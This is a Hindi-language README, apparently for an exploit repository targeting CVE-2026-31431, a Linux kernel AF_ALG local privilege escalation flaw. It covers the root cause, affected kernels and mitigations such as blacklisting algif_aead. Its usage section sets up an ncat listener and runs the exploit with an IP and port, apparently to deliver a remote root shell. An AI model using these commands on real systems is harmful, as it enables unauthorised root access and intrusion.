
# CVE-2026-31431 के लिए स्थानीय विशेषाधिकार वृद्धि शोषण यह Linux कर्नेल AF_ALG तर्क दोष का शोषण है, जो अविशेषाधिकार प्राप्त उपयोगकर्ताओं को पेज कैश में 4 बाइट्स लिखने और रूट विशेषाधिकार प्राप्त करने की अनुमति देता है। इसमें PoC स्क्रिप्ट और शमन मार्गदर्शन शामिल है।
कॉपी फेल लिनक्स कर्नेल के क्रिप्टोग्राफिक सबसिस्टम (algif_aead) में एक उच्च-गंभीरता वाली लोकल प्रिविलेज एस्केलेशन (LPE) भेद्यता है। 29 अप्रैल, 2026 को Theori (उनके Xint Code AI-सहायता प्राप्त भेद्यता अनुसंधान टूल के माध्यम से) द्वारा खोजा और प्रकट किया गया, यह दोष किसी भी अनप्रिविलेज्ड लोकल उपयोगकर्ता को किसी भी पठनीय फ़ाइल के पेज कैश में 4 नियंत्रित बाइट्स लिखने की अनुमति देता है — और 2017 से शिप किए गए लगभग हर प्रमुख लिनक्स वितरण पर रूट प्राप्त करने के लिए इसका उपयोग कर सकता है।
एक कार्यशील प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट केवल ~732 बाइट्स का Python है।
sudo ncat -lvnp PORT
# Python स्क्रिप्ट का उपयोग करके
python3 CVE-2026-31431-Exploit.py IP PORT
# संकलित बाइनरी
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT
AF_ALG सॉकेट और authencesn(hmac(sha256),cbc(aes)) से बाइंड करेंमूल रूप से 2017 से जारी हर प्रमुख लिनक्स वितरण प्रभावित है।
अपने कर्नेल को फिक्स कमिट fafe0fa2995a वाले संस्करण में अपडेट करें। अधिकांश प्रमुख वितरणों ने अपडेटेड कर्नेल पैकेज जारी किए हैं या जारी कर रहे हैं।
यदि आप तुरंत पैच नहीं कर सकते:
algif_aead मॉड्यूल को ब्लैकलिस्ट करें:
echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
sudo modprobe -r algif_aead 2>/dev/null
यह रिपॉजिटरी केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए है। यहां दी गई जानकारी सुरक्षा टीमों को CVE-2026-31431 को समझने, पता लगाने और कम करने में मदद करने के लिए है। हमेशा जिम्मेदार प्रकटीकरण प्रथाओं और लागू कानूनों का पालन करें।
| फ़ील्ड | विवरण |
|---|
| CVE ID | CVE-2026-31431 |
| CVSS स्कोर | 7.8 (HIGH) |
| प्रकार | लोकल प्रिविलेज एस्केलेशन (LPE) |
| घटक | algif_aead — लिनक्स कर्नेल AF_ALG यूज़रस्पेस क्रिप्टो इंटरफ़ेस |
| मूल कारण | authencesn AEAD टेम्पलेट में लॉजिक दोष; एक इन-प्लेस ऑप्टिमाइज़ेशन (कमिट 72548b093ee3, अगस्त 2017) के कारण पेज-कैश पेज कर्नेल के राइटेबल डेस्टिनेशन स्कैटरलिस्ट में दिखाई देते हैं |
| प्रिमिटिव | किसी भी पठनीय फ़ाइल के पेज कैश में 4-बाइट नियंत्रित लेखन |
| एक्सप्लॉइट तंत्र | AF_ALG सॉकेट → splice() → setuid बाइनरी का पेज-कैश भ्रष्टाचार → रूट |
| रेस कंडीशन? | ❌ नहीं — सीधा लॉजिक दोष, 100% विश्वसनीय |
| कर्नेल ऑफसेट आवश्यक? | ❌ नहीं |
| फिक्स कमिट | fafe0fa2995a (2017 के ऑप्टिमाइज़ेशन को वापस लेता है) |
| प्रभावित | प्रभावित नहीं |
|---|
| लिनक्स कर्नेल 4.14 से 7.0-rc तक | 4.14 से पहले के कर्नेल (अगस्त 2017 कमिट से पहले) |
| 6.18.22 से पहले के सभी 6.18.x | 6.18.22+ (पैच किया गया) |
| 6.19.12 से पहले के सभी 6.19.x | 6.19.12+ (पैच किया गया) |